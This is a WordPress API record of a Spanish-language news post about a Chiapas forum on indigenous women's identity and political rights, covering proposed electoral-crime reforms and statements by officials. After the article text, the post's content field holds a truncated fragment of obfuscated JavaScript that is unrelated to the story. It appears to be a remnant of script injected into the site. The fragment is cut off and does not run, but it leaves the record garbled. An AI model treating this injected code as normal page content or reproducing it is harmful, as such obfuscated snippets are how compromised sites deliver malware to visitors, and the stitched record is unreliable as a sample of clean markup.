{"id":5507,"date":"2022-09-29T02:04:26","date_gmt":"2022-09-29T02:04:26","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5507"},"modified":"2022-09-29T02:04:26","modified_gmt":"2022-09-29T02:04:26","slug":"llevan-a-cabo-foro-mujeres-y-pueblos-indigenas-respeto-a-su-identidad-participacion-y-derechos-politicos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5507","title":{"rendered":"Llevan a cabo foro: \u201cMujeres y Pueblos ind\u00edgenas; Respeto a su Identidad, Participaci\u00f3n y Derechos Pol\u00edticos\u201d"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220928-WA0078.jpg\" alt=\"\" class=\"wp-image-5508\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220928-WA0078.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220928-WA0078-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220928-WA0078-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220928-WA0078-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>&nbsp;Tuxtla Guti\u00e9rrez, 28 de septiembre de 2022.- El Congreso de Chiapas y la Secretar\u00eda de Igualdad de G\u00e9nero de Gobierno del Estado, llevaron a cabo el foro H\u00edbrido denominado: \u201cMujeres y Pueblos ind\u00edgenas; Respeto a su Identidad, Participaci\u00f3n y Derechos Pol\u00edticos\u201d, que busca ser garante de los derechos de las ind\u00edgenas.<\/p>\n\n\n\n<p>La diputada Cecilia L\u00f3pez S\u00e1nchez, mencion\u00f3 que la iniciativa que ellas est\u00e1n proponiendo con car\u00e1cter de decreto, adiciona la fracci\u00f3n 20 y se reforma el \u00faltimo p\u00e1rrafo al art\u00edculo 481 del C\u00f3digo Penal para el Estado de Chiapas, por el que se adiciona la fracci\u00f3n 12 y se reforma el \u00faltimo p\u00e1rrafo al art\u00edculo 483 del mismo C\u00f3digo.<\/p>\n\n\n\n<p>&nbsp;Pero adem\u00e1s se adiciona la fracci\u00f3n 11 y se reforma el \u00faltimo p\u00e1rrafo al art\u00edculo 484, por el que se adiciona la fracci\u00f3n 6 del art\u00edculo 487 y por el que se adiciona el art\u00edculo 488 Bis, en materia de delitos electorales del C\u00f3digo Electoral de Chiapas, esto es para garantizar los derechos pol\u00edticos y electorales de los pueblos ind\u00edgenas.<\/p>\n\n\n\n<p>Por su lado, la titular de la Secretar\u00eda de Igualdad de G\u00e9nero, Mar\u00eda Mandiola Totoricag\u00fcena, dijo que se viven cambios culturales importantes para las mujeres ind\u00edgenas, ejemplific\u00f3 que hay acuerdos en comunidades ind\u00edgenas- de acuerdo a usos y costumbres- para poner un alto a la violencia hacia ellas mismas.<\/p>\n\n\n\n<p>Tambi\u00e9n hicieron uso de la palabra el Secretario de Desarrollo Sustentable de los Pueblos Ind\u00edgenas, Emilio Ram\u00f3n Ram\u00edrez, las legisladoras Leticia M\u00e9ndez Entzin, Elizabeth Escobedo Morales, la doctora Aracely Burguete Cal y Mayor, entre otros, que reforzaron la propuesta legislativa de Chiapas.<\/p>\n\n\n\n<p>Se Cerr\u00f3 diciendo que los pueblos ind\u00edgenas constituyen uno de los sectores de la sociedad mexicana que requiere mayor atenci\u00f3n para su desarrollo econ\u00f3mico, pol\u00edtico, social y cultural, en cuanto a las mujeres ind\u00edgenas, han desempe\u00f1ado un papel decisivo en la lucha por la autodeterminaci\u00f3n de sus pueblos y sus derechos como mujeres.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>&nbsp;Tuxtla Guti\u00e9rrez, 28 de septiembre de 2022.- El Congreso de Chiapas y la Secretar\u00eda de Igualdad de G\u00e9nero de Gobierno del Estado, llevaron a cabo el foro H\u00edbrido denominado: \u201cMujeres y Pueblos ind\u00edgenas; Respeto a su Identidad, Participaci\u00f3n y Derechos Pol\u00edticos\u201d, que busca ser garante de los derechos de las ind\u00edgenas. La diputada Cecilia L\u00f3pez &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5508,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-5507","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5507","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5507"}],"version-history":[{"count":2,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5507\/revisions"}],"predecessor-version":[{"id":5510,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5507\/revisions\/5510"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5508"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5507"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5507"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5507"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}